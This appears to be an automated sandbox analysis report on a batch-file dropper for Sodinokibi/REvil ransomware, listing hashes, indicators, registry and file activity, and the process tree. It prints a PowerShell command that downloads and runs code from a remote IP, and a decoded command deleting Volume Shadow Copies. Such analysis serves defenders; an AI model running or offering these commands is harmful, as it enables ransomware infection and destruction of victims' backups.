Analysis
- max time kernel: 29s
- max time network: 52s
- platform: windows7_x64
- resource: win7v200430
- submitted: 04-05-2020 09:10
Static task: static1
Behavioral task: behavioral1
  Sample: Evb87yyM.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: Evb87yyM.bat
  Resource: win10v200430
General
- Target: Evb87yyM.bat
- Size: 190B
- MD5: 8e4d79c1afbe60f75e7f18f5e125dd5e
- SHA1: 45a3951131e3b20026690d0d5f3ce0a84d633e31
- SHA256: 46f6f9a88c6598831db0c71784a9cce294f3647121cba6e7dafe783523aac095
- SHA512: 3b56433e7e0f688e1c39dac8e3c12e1537ca8c6c6f8dd24cb780ec8d24f6d21c2381eacb1ae4a0785a826f207e8606e3ded0ab904fe86cff10d45c67efa3f3a2
Malware Config
Extracted
- URL: http://185.103.242.78/pastes/Evb87yyM
Extracted
- Path: C:\2gq13331ju-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/48C1B3A143AB7DAE
  - http://decryptor.cc/48C1B3A143AB7DAE
Signatures
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\x5g3e965r965.bmp" (powershell.exe)
- Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe
  - PID 1292 powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  - PID 888 (cmd.exe) wrote to memory of PID 1292 (powershell.exe)
  - PID 1292 (powershell.exe) wrote to memory of PID 784 (powershell.exe)
  - PID 1292 (powershell.exe) wrote to memory of PID 784 (powershell.exe)
  - PID 1292 (powershell.exe) wrote to memory of PID 784 (powershell.exe)
  - PID 1292 (powershell.exe) wrote to memory of PID 784 (powershell.exe)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 1292 powershell.exe
  - Token: SeDebugPrivilege, PID 1292 powershell.exe
  - Token: SeDebugPrivilege, PID 784 powershell.exe
  - Token: SeBackupPrivilege, PID 1724 vssvc.exe
  - Token: SeRestorePrivilege, PID 1724 vssvc.exe
  - Token: SeAuditPrivilege, PID 1724 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 1292 powershell.exe
- Makes http(s) request (1 IoC)
  Contacts server via http/https, possibly for C2 communication.
  - HTTP URL, flow 1: http://185.103.242.78/pastes/Evb87yyM
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe, powershell.exe
  - PID 1292 powershell.exe
  - PID 1292 powershell.exe
  - PID 1292 powershell.exe
  - PID 784 powershell.exe
  - PID 784 powershell.exe
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  - flow 1, PID 1292 powershell.exe
- Drops file in Program Files directory (16 IoCs)
  Processes: powershell.exe
  - File opened for modification: \??\c:\program files\SaveOut.scf (powershell.exe)
  - File opened for modification: \??\c:\program files\SubmitRestart.emz (powershell.exe)
  - File opened for modification: \??\c:\program files\UnpublishGroup.emz (powershell.exe)
  - File opened for modification: \??\c:\program files\OutRegister.potx (powershell.exe)
  - File opened for modification: \??\c:\program files\RedoUpdate.ppt (powershell.exe)
  - File opened for modification: \??\c:\program files\EnableCompress.eps (powershell.exe)
  - File opened for modification: \??\c:\program files\LimitRestore.xlt (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\2gq13331ju-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\TraceLock.mov (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\2gq13331ju-readme.txt (powershell.exe)
  - File created: \??\c:\program files\2gq13331ju-readme.txt (powershell.exe)
  - File created: \??\c:\program files (x86)\2gq13331ju-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\NewResume.vdx (powershell.exe)
  - File opened for modification: \??\c:\program files\StartConfirm.htm (powershell.exe)
  - File opened for modification: \??\c:\program files\SyncGrant.mpeg (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\2gq13331ju-readme.txt (powershell.exe)
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Evb87yyM.bat"
  PID: 888
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Evb87yyM');Invoke-FLEYEFI;Start-Sleep -s 10000"
    PID: 1292
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} - i.e. deletion of Volume Shadow Copies, which is what triggers the vssvc.exe activity recorded below)
      PID: 784
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1724
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken